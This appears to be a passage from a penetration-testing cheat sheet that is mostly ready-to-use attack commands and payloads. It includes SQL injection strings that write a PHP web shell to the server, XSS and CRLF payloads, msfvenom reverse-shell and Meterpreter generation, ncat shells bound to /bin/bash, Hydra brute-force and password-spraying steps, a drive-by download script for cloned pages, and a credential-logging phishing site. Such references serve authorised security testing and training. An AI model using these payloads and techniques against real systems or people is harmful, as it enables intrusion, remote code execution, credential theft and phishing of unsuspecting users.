apt-get update && apt-get -y install nuclei

Download the latest Nuclei templates.

To download and/or update Nuclei templates, run:

mkdir ~/nuclei-templates && nuclei -ut ~/nuclei-templates

Vulnerability scan (all templates):

nuclei -c 500 -o nuclei_results.txt -l subdomains_live.txt

cat nuclei_results.txt | grep -Po '(?<=\]\ ).+' | sort -uf > nuclei_sorted_results.txt

Only subdomain takeover:

nuclei -c 500 -t ~/nuclei-templates/takeovers -o nuclei_takeover_results.txt -l subdomains_live.txt

WFUZZ

Fuzz directories:

wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X GET -u "https://somesite.com/WFUZZ" -w directory-list-lowercase-2.3-medium.txt

Fuzz parameter values:

wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X GET -u "https://somesite.com/someapi?someparam=WFUZZ" -w somewordlist.txt

wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X POST -H "Content-Type: application/x-www-form-urlencoded" -u "https://somesite.com/someapi" -d "someparam=WFUZZ" -w somewordlist.txt

wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X POST -H "Content-Type: application/json" -u "https://somesite.com/someapi" -d "{\"someparam\": \"WFUZZ\"}" -w somewordlist.txt

Fuzz parameters:

wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X GET -u "https://somesite.com/someapi?WFUZZ=somevalue" -w somewordlist.txt

wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X POST -H "Content-Type: application/x-www-form-urlencoded" -u "https://somesite.com/someapi" -d "WFUZZ=somevalue" -w somewordlist.txt

wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X POST -H "Content-Type: application/json" -u "https://somesite.com/someapi" -d "{\"WFUZZ\": \"somevalue\"}" -w somewordlist.txt

Additional example, internal SSRF fuzzing:

wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X GET -u "https://somesite.com/someapi?url=127.0.0.1:WFUZZ" -w ports.txt

wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X GET -u "https://somesite.com/someapi?url=WFUZZ:80" -w ips.txt
Option Description
-f Store results in the output file
-t Specify the number of concurrent connections (10 default)
-s Specify time delay between requests (0 default)
-u Specify a URL for the request
-w Specify a wordlist file
-X Specify an HTTP method for the request, e.g. HEAD or FUZZ
-b Specify a cookie for the requests
-d Use post data
-H Use header
--hc/--hl/--hw/--hh Hide responses with the specified code/lines/words/chars
--sc/--sl/--sw/--sh Show responses with the specified code/lines/words/chars
--ss/--hs Show/hide responses with the specified regex within the content

Insecure Direct Object Reference (IDOR)

First, try to simply change one value to another, e.g. change the email address in a request to another user's email address, or change ID 1 to ID 2, etc.

It might be possible that ID 1 relates to some higher privilege account or role.

Second, try parameter pollution, e.g. supply the same parameter twice with different values (id=1&id=2) and see which one the server honors.

HTTP Response Splitting

Also known as CRLF injection. CRLF refers to carriage return (ASCII 13, \r) and line feed (ASCII 10, \n).

When URL-encoded, \r becomes %0D and \n becomes %0A.

Fixate a session cookie:

somesite.com/redirect.asp?origin=somesite.com%0D%0ASet-Cookie:%20ASPSESSION=123456789

Open redirect:

somesite.com/home.php?marketing=winter%0D%0ALocation:%20https%3A%2F%2Fgithub.com

Session fixation and open redirection are just two of many techniques used in combination with HTTP response splitting. Search the Internet for more information.
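The URL encoding above can be generated rather than typed by hand; a minimal Python sketch (the target and cookie value are the illustrative ones from the payload above):

```python
from urllib.parse import quote

# URL-encode the CRLF sequence and the injected header;
# ':' and '=' are kept literal to match the payloads above
injected = "\r\nSet-Cookie: ASPSESSION=123456789"
payload = "somesite.com/redirect.asp?origin=somesite.com" + quote(injected, safe=":=")
print(payload)
```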

Cross-Site Scripting (XSS)

Simple cross-site scripting (XSS) examples:

<script>alert(1)</script>

<script src="https://myserver.com/xss.js"></script>

<img src="https://github.com/favicon.ico" onload="alert(1)">

Hosting JavaScript on Pastebin doesn't work because Pastebin serves raw pastes with a text/plain Content-Type.

Find out more about reflected and stored cross-site scripting (XSS) attacks, as well as cross-site request forgery (XSRF/CSRF) attacks from my other project.

Valid emails with embedded XSS:

user+(<script>alert(1)</script>)@somedomain.com

user@somedomain(<script>alert(1)</script>).com

"<script>alert(1)</script>"@somedomain.com

SQL Injection

The following examples were tested on a MySQL database. Note that MySQL requires a white space between the double-hyphen comment symbol and the next character (hence the trailing space in the payloads below).

If you need to URL encode the white space, use either %20 or +.

Try to produce database errors by injecting a single-quote, back-slash, double-hyphen, forward-slash, or period.

Always make sure to properly close the surrounding code.

Read this article to learn how to bypass WAF.


Boolean-based SQLi:

' OR 1=1-- 

' OR 1=2-- 

Union-based SQLi:

' UNION SELECT 1,2,3,4-- 

' UNION SELECT NULL,NULL,NULL,NULL-- 

' UNION SELECT 1,concat_ws('|',database(),current_user(),version()),3,4-- 

' UNION SELECT 1,concat_ws('|',table_schema,table_name,column_name,data_type,character_maximum_length),3,4 FROM information_schema.columns-- 

' UNION SELECT 1,load_file('..\\..\\apache\\conf\\httpd.conf'),3,4-- 

If using e.g. 1,2,3,4 does not work, try using NULL,NULL,NULL,NULL respectively.

Use the union-based SQLi only when you are able to use the same communication channel to both launch the attack and gather results.

The goal is to determine the exact number of columns in the application's query and to figure out which of them are displayed to the user.

Another way to determine the exact number of columns is by using e.g. ' ORDER BY 1-- , where 1 is the column number used for sorting; keep incrementing it by one until the query errors out - the last value that works is the number of columns.


Time-based SQLi:

' AND (SELECT 1 FROM (SELECT sleep(2)) test)-- 

' AND (SELECT 1 FROM (SELECT CASE user() WHEN 'root@localhost' THEN sleep(2) ELSE sleep(0) END) test)-- 

' AND (SELECT 1 FROM (SELECT CASE substring(current_user(),1,1) WHEN 'r' THEN sleep(2) ELSE sleep(0) END) test)-- 

' AND (SELECT CASE substring(password,1,1) WHEN '$' THEN sleep(2) ELSE sleep(0) END FROM users WHERE id = 1)-- 

' AND IF(version() LIKE '5%',sleep(2),sleep(0))-- 

Use the time-based SQLi when you are not able to see the results.


Check for existence/correctness:

' AND (SELECT 'exists' FROM users) = 'exists

' AND (SELECT 'exists' FROM users WHERE username = 'administrator') = 'exists

' AND (SELECT 'correct' FROM users WHERE username = 'administrator' AND length(password) < 8) = 'correct

' AND (SELECT CASE substring(password,1,1) WHEN '$' THEN to_char(1/0) ELSE 'correct' END FROM users WHERE username = 'administrator') = 'correct

'||(SELECT CASE substring(password,1,1) WHEN '$' THEN to_char(1/0) ELSE '' END FROM users WHERE username = 'administrator')||'

Note that to_char() is an Oracle function; the two error-based examples above will not work on MySQL as-is.
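Checks like these can be automated to extract a secret one character at a time from nothing but a true/false (or error/no-error) signal. A self-contained Python sketch in which the vulnerable endpoint is simulated by a local function - in a real test, oracle() would be an HTTP request, and the secret, charset, and column names are assumptions to adapt:

```python
import string

SECRET = "$2y$10ab"  # stands in for the value being extracted

def oracle(injected_condition: bool) -> bool:
    # in a real attack this would be an HTTP request whose response
    # (content, error, or delay) reveals whether the condition held
    return injected_condition

def extract(length: int) -> str:
    recovered = ""
    charset = string.printable
    for position in range(length):
        for candidate in charset:
            # mirrors: ' AND (SELECT CASE substring(password,pos,1) WHEN 'c' ...
            if oracle(SECRET[position] == candidate):
                recovered += candidate
                break
    return recovered

print(extract(len(SECRET)))  # $2y$10ab
```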

Inject a simple PHP web shell based on an HTTP GET request:

' UNION SELECT '', '', '', '<?php if(isset($_GET["command"])){echo shell_exec($_GET["command"]);} ?>' INTO DUMPFILE '..\\..\\htdocs\\backdoor.php'-- 

' UNION SELECT '', '', '', '<?php $p="command";$o=null;if(isset($_SERVER["REQUEST_METHOD"])&&strtolower($_SERVER["REQUEST_METHOD"])==="get"&&isset($_GET[$p])&&($_GET[$p]=trim($_GET[$p]))&&strlen($_GET[$p])>0){$o=@shell_exec("($_GET[$p]) 2>&1");if($o===false){$o="ERROR: The function might be disabled.";}else{$o=str_replace("<","&lt;",$o);$o=str_replace(">","&gt;",$o);}} ?><!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>Simple PHP Web Shell</title><meta name="author" content="Ivan Šincek"><meta name="viewport" content="width=device-width, initial-scale=1.0"></head><body><pre><?php echo $o;unset($o);unset($_GET[$p]); ?></pre></body></html>' INTO DUMPFILE '..\\..\\htdocs\\backdoor.php'-- 

To successfully inject a web shell, the current database user must have the FILE privilege and write access to the target directory.

sqlmap

Inject SQL code into request parameters:

sqlmap -a -u "somesite.com/index.php?username=test&password=test"

sqlmap -a -u "somesite.com/index.php" --data "username=test&password=test"

sqlmap -a -u "somesite.com/index.php" --data "username=test&password=test" -p password
Option Description
-u Target URL
-H Extra HTTP header
--data Data string to be sent through POST
--cookie HTTP Cookie header value
--proxy Use a proxy to connect to the target URL ([protocol://]host[:port])
-p Testable parameter(s)
--level Level of tests to perform (1-5, default: 1)
--risk Risk of tests to perform (1-3, default: 1)
-a Retrieve everything
-b Retrieve DBMS banner
--dump-all Dump all DBMS databases tables entries
--os-shell Prompt for an interactive operating system shell
--os-pwn Prompt for an OOB shell, Meterpreter, or VNC
--sqlmap-shell Prompt for an interactive sqlmap shell
--wizard Simple wizard interface for beginner users
--dbms Force back-end DBMS to provided value

dotdotpwn

Traverse a path (e.g. somesite.com/../../../etc/passwd):

dotdotpwn -q -m http -S -o windows -f /windows/win.ini -k mci -h somesite.com

dotdotpwn -q -m http -o unix -f /etc/passwd -k root -h somesite.com

dotdotpwn -q -m http-url -o unix -f /etc/hosts -k localhost -u 'https://somesite.com/index.php?file=TRAVERSAL'

Try to prepend a protocol such as file://, gopher://, dict://, php://, jar://, ftp://, tftp://, etc. to the file path, e.g. file://TRAVERSAL.

Check some additional directory traversal tips at swisskyrepo/PayloadsAllTheThings. Credits to the author!

Option Description
-m Module (http, http-url, ftp, tftp, payload, stdout)
-h Hostname
-O Operating System detection for intelligent fuzzing (nmap)
-o Operating System type if known ("windows", "unix", or "generic")
-d Depth of traversals (default: 6)
-f Specific filename (default: according to OS detected)
-S Use SSL for HTTP and Payload module (not needed for http-url)
-u URL with the part to be fuzzed marked as TRAVERSAL
-k Text pattern to match in the response
-p Filename with the payload to be sent and the part to be fuzzed marked with the TRAVERSAL keyword
-x Port to connect (default: HTTP=80; FTP=21; TFTP=69)
-U Username (default: 'anonymous')
-P Password (default: 'dot(at)dot.pwn')
-M HTTP Method to use when using the 'http' module (GET, POST, HEAD, COPY, MOVE, default: GET)
-b Break after the first vulnerability is found
-C Continue if no data was received from host

Web Shells

Find out more about PHP shells from my other project.

Find out more about Java/JSP shells from my other project.

Send a Payload With Python

Find out how to generate a reverse shell payload for Python and send it to a target's machine from my other project.

4. Post Exploitation

4.1 Useful Websites

Generate a Reverse Shell Payload for Windows OS

To generate a Base64 encoded payload, use one of the following MSFvenom commands (modify them to your need):

msfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f raw -b "\x00\x0a\x0d\xff" | base64 -w 0 > payload.txt

msfvenom --platform windows -a x64 -e x64/xor -p windows/x64/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f raw -b "\x00\x0a\x0d\xff" | base64 -w 0 > payload.txt

msfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/meterpreter_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f raw | base64 -w 0 > payload.txt

msfvenom --platform windows -a x64 -e x64/xor -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f raw | base64 -w 0 > payload.txt

To generate a binary file, use one of the following MSFvenom commands (modify them to your need):

msfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f raw -b "\x00\x0a\x0d\xff" -o payload.bin

msfvenom --platform windows -a x64 -e x64/xor -p windows/x64/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f raw -b "\x00\x0a\x0d\xff" -o payload.bin

msfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/meterpreter_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f raw -o payload.bin

msfvenom --platform windows -a x64 -e x64/xor -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f raw -o payload.bin

To generate a DLL file, use one of the following MSFvenom commands (modify them to your need):

msfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f dll -b "\x00\x0a\x0d\xff" -o payload.dll

msfvenom --platform windows -a x64 -e x64/xor -p windows/x64/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f dll -b "\x00\x0a\x0d\xff" -o payload.dll

To generate a standalone executable file, use one of the following MSFvenom commands (modify them to your need):

msfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f exe -b "\x00\x0a\x0d\xff" -o payload.exe

msfvenom --platform windows -a x64 -e x64/xor -p windows/x64/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f exe -b "\x00\x0a\x0d\xff" -o payload.exe

msfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/meterpreter_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f exe -o payload.exe

msfvenom --platform windows -a x64 -e x64/xor -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f exe -o payload.exe

To generate an MSI file, use one of the following MSFvenom commands (modify them to your need):

msfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f msi -b "\x00\x0a\x0d\xff" -o payload.msi

msfvenom --platform windows -a x64 -e x64/xor -p windows/x64/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f msi -b "\x00\x0a\x0d\xff" -o payload.msi

Bytecode might not work on the first try due to some other bad characters. Trial and error is the key.

So far, there is no easy way to generate a DLL or MSI file with a stageless Meterpreter shell due to size constraints.

PowerShell Encoded Command

To generate a PowerShell encoded command from a PowerShell script, run the following PowerShell command:

[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes([IO.File]::ReadAllText($script)))

To run the PowerShell encoded command, run the following command from either PowerShell or Command Prompt:

PowerShell -ExecutionPolicy Unrestricted -NoProfile -EncodedCommand $command

To decode a PowerShell encoded command, run the following PowerShell command:

[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($command))
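-EncodedCommand expects Base64 over UTF-16LE text, which is exactly what [Text.Encoding]::Unicode produces. The same round trip can be done in Python when preparing payloads off-box; the script string below is illustrative:

```python
import base64

script = "Write-Output 'test'"

# PowerShell's [Text.Encoding]::Unicode is UTF-16LE
encoded = base64.b64encode(script.encode("utf-16-le")).decode()
decoded = base64.b64decode(encoded).decode("utf-16-le")

print(encoded)
print(decoded)  # Write-Output 'test'
```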

Find out more about PowerShell reverse and bind TCP shells from my other project.

5. Password Cracking

Google a hash before trying to crack it because you might save yourself a lot of time and trouble.

Use Google Dorks, Chad, or FOCA to find files and, within their metadata, domain usernames to brute force.

Keep in mind that you might lock out people's accounts.

Keep in mind that some web forms implement CAPTCHA and/or hidden submission tokens which may prevent you from brute forcing. Try to submit requests without tokens or CAPTCHA.

You can find a bunch of wordlists in SecLists.

5.1 Useful Websites

crunch

Generate a lower-alpha-numeric wordlist:

crunch 4 6 -f /usr/share/crunch/charset.lst lalpha-numeric -o crunch_wordlist.txt

See the list of all available charsets, or add your own, in charset.lst located in the /usr/share/crunch/ directory.

Generate all the possible permutations from words:

crunch -o crunch_wordlist.txt -p admin 123 \!\"

crunch -o crunch_wordlist.txt -q words.txt

Generate all the possible combinations from a charset:

crunch 4 6 -o crunch_wordlist.txt -p admin123\!\"
Option Description
-d Limits the number of consecutive characters
-f Specifies a character set from a file
-i Inverts the output
-l When you use the -t option this option tells crunch which symbols should be treated as literals
-o Specifies the file to write the output to
-p Tells crunch to generate/permute words that don't have repeating characters
-q Tells crunch to read a file and permute what is read
-r Tells crunch to resume generating words from where it left off, -r only works if you use -o
-s Specifies a starting string
-t Specifies a pattern
Placeholder Description
@ Lower case characters
, Upper case characters
% Numbers
^ Symbols

Unfortunately, there is no placeholder ranging from lowercase-alpha to symbols.

Generate all the possible combinations from a placeholder:

crunch 10 10 -o crunch_wordlist.txt -t admin%%%^^

crunch 10 10 -o crunch_wordlist.txt -t admin%%%^^ -d 2% -d 1^

crunch 10 10 + + 123456 \!\" -o crunch_wordlist.txt -t admin@@%^^

crunch 10 10 -o crunch_wordlist.txt -t @dmin@@%^^ -l @aaaaaaaaa
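If you need more control than crunch offers, charset combinations are easy to reproduce with Python's itertools.product; the charset and lengths below are illustrative:

```python
from itertools import product

charset = "abc1"
min_len, max_len = 2, 3

# every combination of the charset for each length, like: crunch 2 3 abc1
words = []
for length in range(min_len, max_len + 1):
    for combo in product(charset, repeat=length):
        words.append("".join(combo))

print(len(words))  # 4**2 + 4**3 = 80
```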

hash-identifier

To identify a hash type, run the following tool:

hash-identifier
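Identification tools mostly key off digest length and character set; a rough first pass is easy to script yourself (the candidate lists below are deliberately not exhaustive):

```python
import hashlib

# hex-digest length -> common candidate algorithms (not exhaustive)
CANDIDATES = {
    32: ["MD5", "NTLM", "MD4"],
    40: ["SHA1"],
    64: ["SHA256"],
    128: ["SHA512"],
}

def guess(digest: str):
    digest = digest.strip()
    # anything outside the hex alphabet is not a raw hex digest
    if not all(c in "0123456789abcdefABCDEF" for c in digest):
        return []
    return CANDIDATES.get(len(digest), [])

print(guess(hashlib.md5(b"test").hexdigest()))  # ['MD5', 'NTLM', 'MD4']
```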

Hashcat

Brute force MD5 hashes:

hashcat -m 0 -a 3 --session=cracking --force --status -O -o hashcat_results.txt hashes.txt

Brute force NetNTLMv1 hashes:

hashcat -m 5500 -a 3 --session=cracking --force --status -O -o hashcat_results.txt hashes.txt

Use --session=<session_name> to save, and continue your cracking progress later using --restore.

Continue cracking progress:

hashcat --session=cracking --restore
Option Description
-m Hash-type, see references below
-a Attack-mode, see references below
--force Ignore warnings
--runtime Abort session after X seconds of runtime
--status Enable automatic update of the status screen
-o Define outfile for recovered hash
--show Show cracked passwords found in potfile
--session Define specific session name
--restore Restore session from --session
--restore-file-path Specific path to restore file
-O Enable optimized kernels (limits password length)
-1 User-defined charset ?1
-2 User-defined charset ?2
-3 User-defined charset ?3
-4 User-defined charset ?4

When specifying a user-defined charset, escape ? with another ? (i.e. use ?? instead of \?).

Hash Type Description
0 MD5
100 SHA1
1400 SHA256
1700 SHA512
200 MySQL323
300 MySQL4.1/MySQL5
1000 NTLM
5500 NetNTLMv1-VANILLA / NetNTLMv1-ESS
5600 NetNTLMv2
2500 WPA/WPA2
16800 WPA-PMKID-PBKDF2
16500 JWT (JSON Web Token)

For more hash types read the manual.

Attack Mode Name
0 Straight
1 Combination
3 Brute Force
6 Hybrid Wordlist + Mask
7 Hybrid Mask + Wordlist
9 Association
Charset Description
?l abcdefghijklmnopqrstuvwxyz
?u ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d 0123456789
?s !"#$%&'()*+,-./:;<=>?@[]^_`{|}~
?a ?l?u?d?s
?b 0x00 - 0xff
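A mask's keyspace is the product of the charset sizes at each position, which tells you up front whether a brute force is feasible. A small estimator covering only the built-in charsets above (custom ?1-?4 charsets are not handled):

```python
# sizes of hashcat's built-in charsets
SIZES = {"l": 26, "u": 26, "d": 10, "s": 33, "a": 95, "b": 256}

def keyspace(mask: str) -> int:
    total, i = 1, 0
    while i < len(mask):
        if mask[i] == "?":
            total *= SIZES[mask[i + 1]]
            i += 2
        else:
            i += 1  # a literal character contributes a single candidate
    return total

print(keyspace("?l?l?d"))  # 26 * 26 * 10 = 6760
```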

Dictionary attack:

hashcat -m 100 -a 0 --session=cracking --force --status -O B1B3773A05C0ED0176787A4F1574FF0075F7521E rockyou.txt

hashcat -m 5600 -a 0 --session=cracking --force --status -O -o hashcat_results.txt hashes.txt rockyou.txt

You can find rockyou.txt wordlist in SecLists.

Brute force a hash using a placeholder:

hashcat -m 0 -a 3 --session=cracking --force --status -O cc158fa2f16206c8bd2c750002536211 -1 ?l?u -2 ?d?s ?1?l?l?l?l?l?2?2

hashcat -m 0 -a 3 --session=cracking --force --status -O 85fb9a30572c42b19f36d215722e1780 -1 \!\"\#\$\%\&\/\(\)\=??\* -2 ?d?1 ?u?l?l?l?l?2?2?2

Cracking the JWT

Dictionary attack:

hashcat -m 16500 -a 0 --session=cracking --force --status -O eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiSm9obiBEb2UifQ.xuEv8qrfXu424LZk8bVgr9MQJUIrp1rHcPyZw_KSsds rockyou.txt

You can also check the JWT cracking tool from my other project.
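HS256 signing is just HMAC-SHA256 over header.payload, so a dictionary attack is easy to sketch in Python. The token below is constructed locally with a known secret purely for illustration:

```python
import base64
import hashlib
import hmac
import json

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def sign(header_payload: str, secret: str) -> str:
    sig = hmac.new(secret.encode(), header_payload.encode(), hashlib.sha256).digest()
    return b64url(sig)

# build a sample token with a known secret (illustration only)
header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
payload = b64url(json.dumps({"name": "John Doe"}).encode())
token = f"{header}.{payload}." + sign(f"{header}.{payload}", "secret123")

def crack(token: str, wordlist):
    # re-sign header.payload with each candidate and compare signatures
    head_pay, _, sig = token.rpartition(".")
    for candidate in wordlist:
        if hmac.compare_digest(sign(head_pay, candidate), sig):
            return candidate
    return None

print(crack(token, ["password", "letmein", "secret123"]))  # secret123
```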

Hydra

Crack an HTTP POST web form login:

hydra -o hydra_results.txt -l admin -P rockyou.txt somesite.com http-post-form '/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed!'

When cracking a web form login, the text after the last colon (here Login failed!) is the failure message Hydra uses to distinguish a failed login from a successful one. The expected message varies between web forms.

Keep in mind that the username and password request parameters can be named differently.

Crack a Secure Shell (SSH) login:

hydra -o hydra_results.txt -L users.txt -P rockyou.txt 192.168.8.5 ssh

You can find a bunch of wordlists in SecLists.

Option Description
-R Restore a previous aborted/crashed session
-S Perform an SSL connect
-O Use old SSL v2 and v3
-s If the service is on a different default port, define it here
-l Login with a login name
-L Load several logins from a file
-p Login with a password
-P Load several passwords from a file
-x Password brute force generation (MIN:MAX:CHARSET), type "-x -h" to get help
-y Disable use of symbols in bruteforce
-e Try "n" null password, "s" login as pass and/or "r" reversed login
-o Write found login/password pairs to a file instead of stdout
-f/-F Exit when a login/pass pair is found (-f per host, -F global)
-M List of servers to attack, one entry per line, ':' to specify port
Supported Services
ftp[s]
http[s]-{get|post}-form
mysql
smb
smtp[s]
snmp
ssh
telnet[s]
vnc

For more supported services read the manual.

Brute Force Syntax Description
MIN Minimum number of characters in the password
MAX Maximum number of characters in the password
CHARSET Charset values are: "a" for lowercase letters, "A" for uppercase letters, "1" for numbers, and for all others, just add their real representation

Brute force attack:

hydra -o hydra_results.txt -l admin -x 4:4:aA1\!\"\#\$\% 192.168.8.5 ftp

Password Spraying

After you have collected enough usernames from the reconnaissance phase, it is time to try to crack some of their passwords.

Find out how to generate a good password spraying wordlist from my other project, but first you will need a few good keywords that describe your target.

Such keywords can be a company name, abbreviations, words that describe your target's services, products, etc.

After you generate the wordlist, use it with tools such as Hydra, Burp Suite Intruder, etc. to crack web login forms. P.S. Hydra can attack authentication mechanisms on all kinds of services/ports.

If a strong password policy is enforced, passwords usually start with one capitalized word followed by a few digits and one special character at the end (e.g. Password123!).

You can also use the generated wordlist with hashcat, e.g. to crack NTLMv2 hashes that you have collected using LLMNR responder, etc.
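The pattern described above (capitalized keyword, a few digits, one trailing special character) is straightforward to generate; the keywords, digits, and specials below are placeholders to replace with target-specific values:

```python
from itertools import product

keywords = ["acme", "banking", "invoice"]  # company name, services, products...
suffixes = ["1", "123", "2023", "01"]
specials = ["!", ".", "#"]

# Capitalized keyword + digits + special character, e.g. Acme123!
wordlist = [
    f"{kw.capitalize()}{num}{sp}"
    for kw, num, sp in product(keywords, suffixes, specials)
]

print(len(wordlist))  # 3 * 4 * 3 = 36
print(wordlist[0])    # Acme1!
```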

6. Social Engineering

Find out how to embed a PowerShell script into an MS Word document from my other project.

Drive-by Download

To force users to download a malicious file, copy and paste this JavaScript code block on a cloned web page:

function download(url, type, name, method) {
	var req = new XMLHttpRequest();
	req.open(method, url, true);
	req.responseType = 'blob';
	req.onload = function() {
		var blob = new Blob([req.response], { type: type })
		var isIE = !!document.documentMode;
		if (isIE) {
			// IE doesn't allow using a blob object directly as link
			// instead it is necessary to use msSaveOrOpenBlob()
			if (window.navigator && window.navigator.msSaveOrOpenBlob) {
				window.navigator.msSaveOrOpenBlob(blob, name);
			}
		} else {
			var anchor = document.createElement('a');
			anchor.href = window.URL.createObjectURL(blob);
			anchor.download = name;
			anchor.click();
			// in Firefox it is necessary to delay revoking the ObjectURL
			setTimeout(function() {
				window.URL.revokeObjectURL(anchor.href);
				anchor.remove();
			}, 250);
		}
	};
	req.send();
}
// specify your file here, use only an absolute URL
download('http://localhost/files/pentest.pdf', 'application/pdf', 'pentest.pdf', 'GET');
// download('http://localhost/files/pentest.docx', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 'pentest.docx', 'GET');

To try it out, copy all the content from \social_engineering\driveby_download\ to your server's web root directory (e.g. to \xampp\htdocs\ on XAMPP), and navigate to the web page with your preferred web browser.

Phishing Website

To try it out, copy all the content from \social_engineering\phishing_website\ to your server's web root directory (e.g. to \xampp\htdocs\ on XAMPP), and navigate to the web page with your preferred web browser.

Captured credentials will be stored in \social_engineering\phishing_website\logs\credentials.log.

Figure 2 - Phishing Website


Read the comments in \social_engineering\phishing_website\index.php to get a better understanding on how all of it works.

You can modify and expand this template to your liking. You have everything that needs to get you started.

You can easily customize CSS to make it look more like the company you are testing, e.g. change colors, logo, etc.

Check the standalone redirect templates in \social_engineering\phishing_website\redirects\ directory.


Use the SingleFile (Chrome/Firefox) browser extension to download a web page as a single HTML file, then rename the file to index.php.

7. Miscellaneous

Here you can find a bunch of random stuff.

7.1 Useful Websites

cURL

Download a file:

curl somesite.com/somefile.txt -o somefile.txt

Upload a file:

curl somesite.com/uploads/ -T somefile.txt

Find out how to test a web server for various HTTP methods and method overrides from my other project.

Option Description
-d Sends the specified data in a POST request to the HTTP server
-H Extra header to include in the request when sending HTTP to a server
-i Include the HTTP response headers in the output
-k Proceed and operate server connections otherwise considered insecure
-o Write to file instead of stdout
-T Transfers the specified local file to the remote URL, same as PUT method
-v Make the operation more talkative
-x Use the specified proxy ([protocol://]host[:port])
-X Specifies a custom request method to use when communicating with the HTTP server

Ncat

[Server] Set up a listener:

ncat -nvlp 9000

ncat -nvlp 9000 > received_data.txt

ncat -nvlp 9000 -e /bin/bash

ncat -nvlp 9000 -e /bin/bash --ssl

ncat -nvlp 9000 --ssl-cert crt.pem --ssl-key key.pem

ncat -nvlp 9000 --keep-open <<< $'HTTP/1.1 200 OK\r\n\r\n'

[Client] Connect to a remote host:

ncat -nv 192.168.8.5 9000

ncat -nv 192.168.8.5 9000 < sent_data.txt

ncat -nv 192.168.8.5 9000 -e /bin/bash

ncat -nv 192.168.8.5 9000 -e /bin/bash --ssl

ncat -nv 192.168.8.5 9000 --ssl-cert crt.pem --ssl-key key.pem

Check if a connection to a specified TCP port (e.g. port 9000 in the examples below) is possible:

for i in {0..255}; do ncat -nv "192.168.8.${i}" 9000 -w 2 -z 2>&1 | grep -Po '(?<=Connected\ to\ )[^\s]+(?=\.)'; done

for ip in $(cat ips.txt); do ncat -nv "${ip}" 9000 -w 2 -z 2>&1 | grep -Po '(?<=Connected\ to\ )[^\s]+(?=\.)'; done
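The same connectivity check can be done from Python with a plain TCP connect and a timeout; hosts and ports below are placeholders:

```python
import socket

def is_open(host: str, port: int, timeout: float = 2.0) -> bool:
    # equivalent to: ncat -nv <host> <port> -w 2 -z
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# sweep a /24 the same way the ncat loop above does:
# open_hosts = [f"192.168.8.{i}" for i in range(256) if is_open(f"192.168.8.{i}", 9000)]
```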

Find out how to create an SSL/TLS certificate from my other project.

multi/handler

Set up a listener (change the PAYLOAD, LHOST, and LPORT as necessary):

msfconsole -q

use exploit/multi/handler

set PAYLOAD windows/shell_reverse_tcp

set LHOST 192.168.8.185

set LPORT 9000

exploit

ngrok

Use ngrok to give your local web server a public address, but do not expose the web server for too long if it is not properly hardened due to security concerns.

I advise you not to transfer any sensitive data over it, just in case.

Additional References

Credits to the authors!
